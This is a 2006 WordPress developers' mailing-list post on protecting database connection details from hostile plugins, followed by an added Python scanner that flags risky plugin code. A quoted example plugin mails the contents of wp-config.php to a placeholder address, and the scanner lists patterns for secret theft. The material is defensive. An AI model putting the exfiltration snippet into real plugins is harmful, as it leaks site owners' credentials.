[wp-hackers] Keeping database connection info safe
Joseph Scott
joseph at randomnetworks.com
Sat Feb 25 01:01:57 GMT 2006
On Feb 24, 2006, at 4:49 PM, Sam Angove wrote:
> On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>>
>> It would be very easy to include some malicious code in a plugin that
>> would attempt to email out those details to "bad people". So my
>> first thought was to simply undefine the database connection info
>> once a successful database connection has been established.
>
> <?php
> /*
> Plugin Name: Evil
> */
> wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
> 'wp-config.php') );
> ?>
>
> Dave Grijalva wrote:
>> A better way to do this with php5 is to use private member
>> variables and a
>> setter function, but I don't think there is a PHP4 equivalent.
>> Can anybody
>> out there think of a PHP4 compatible way to secure that data?
>
> You could still read in the source file containing the setter, so
> you're right back where you started.
You are absolutely correct. I must admit that I hadn't thought about
re-including the wp-config.php file. Well that bites. Is there any
way to really protect against this in either PHP4 or PHP5? I'm
inclined at this point to say no and that everyone better be scanning
their plugins for "evil". Has anyone put together a list of things
that should raise the red flag when they see it in a plugin?
--
Joseph Scott
joseph at randomnetworks.com
http://joseph.randomnetworks.com/
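The message above asks for a list of things that should raise a red flag when seen in a plugin. The following Python script is an added illustration, not code from the original thread or from WordPress: it is a small heuristic scanner that reads plugin source and reports the patterns a reviewer would want to look at by hand (reading wp-config.php, reading files as strings, sending mail or making outbound HTTP requests, dynamic code execution, obfuscation helpers, references to the DB_* constants), and it flags a file as suspicious when a "read" pattern co-occurs with a "send" pattern, which is exactly the shape of the Evil plugin quoted above. The red-flag list, the function names (`scan_source`, `is_exfiltration_pattern`, `scan_plugins`, `scan_directory`) and the sample sources (the quoted Evil snippet plus a constructed benign plugin) are my own assumptions.

```python
from __future__ import annotations

import re
from pathlib import Path

# Constructed sample plugin sources used to exercise the scanner offline.
# "evil.php" is the snippet quoted in the thread; "benign.php" is a made-up harmless plugin.
SAMPLE_PLUGINS = {
    "evil.php": """<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH . 'wp-config.php') );
?>""",
    "benign.php": """<?php
/*
Plugin Name: Hello
*/
function hello_footer() { echo '<p>Hello</p>'; }
add_action('wp_footer', 'hello_footer');
?>""",
}

# Heuristic red flags (assumed list): each hit is a reason to read the code by hand,
# not proof of malice. Legitimate plugins use several of these functions too.
RED_FLAGS = [
    ("reads wp-config.php", re.compile(r"wp-config\.php")),
    ("reads files as strings", re.compile(r"\b(file_get_contents|file|readfile|fopen)\s*\(")),
    ("references DB constants", re.compile(r"\bDB_(PASSWORD|USER|HOST|NAME)\b")),
    ("sends mail", re.compile(r"\b(wp_mail|mail)\s*\(")),
    ("outbound HTTP", re.compile(r"\b(curl_init|fsockopen|wp_remote_post|wp_remote_get)\s*\(")),
    ("dynamic code execution", re.compile(r"\b(eval|create_function|assert)\s*\(")),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(")),
]

READ_FLAGS = {"reads wp-config.php", "reads files as strings", "references DB constants"}
SEND_FLAGS = {"sends mail", "outbound HTTP"}


def scan_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, flag_name) for every red flag found in one plugin file."""
    hits: list[tuple[int, str]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RED_FLAGS:
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def is_exfiltration_pattern(hits: list[tuple[int, str]]) -> bool:
    """True when the file both reads sensitive data and has a way to send it out."""
    names = {name for _, name in hits}
    return bool(names & READ_FLAGS) and bool(names & SEND_FLAGS)


def scan_plugins(sources: dict[str, str]) -> dict[str, dict]:
    """Scan a mapping of file name -> PHP source and build a per-file report."""
    report = {}
    for filename, source in sources.items():
        hits = scan_source(source)
        report[filename] = {"hits": hits, "suspicious": is_exfiltration_pattern(hits)}
    return report


def scan_directory(plugin_dir: str) -> dict[str, dict]:
    """Scan every .php file under a plugin directory (e.g. wp-content/plugins/foo)."""
    root = Path(plugin_dir)
    sources = {
        str(p.relative_to(root)): p.read_text(errors="replace")
        for p in root.rglob("*.php")
    }
    return scan_plugins(sources)


if __name__ == "__main__":
    for filename, result in scan_plugins(SAMPLE_PLUGINS).items():
        verdict = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{filename}: {verdict}")
        for lineno, name in result["hits"]:
            print(f"  line {lineno}: {name}")
```

Run it as-is to see the two constructed samples scored, or call `scan_directory("wp-content/plugins/some-plugin")` against an installed plugin. The scanner is deliberately noisy: a contact-form plugin will trip "sends mail" and a backup plugin will trip "reads files as strings", so the useful signal is the combination of a read and a send in the same file, plus any hit in a plugin whose stated purpose does not explain it. It does not replace reading the code, which, as the thread concludes, is the only real protection once a plugin can re-read wp-config.php.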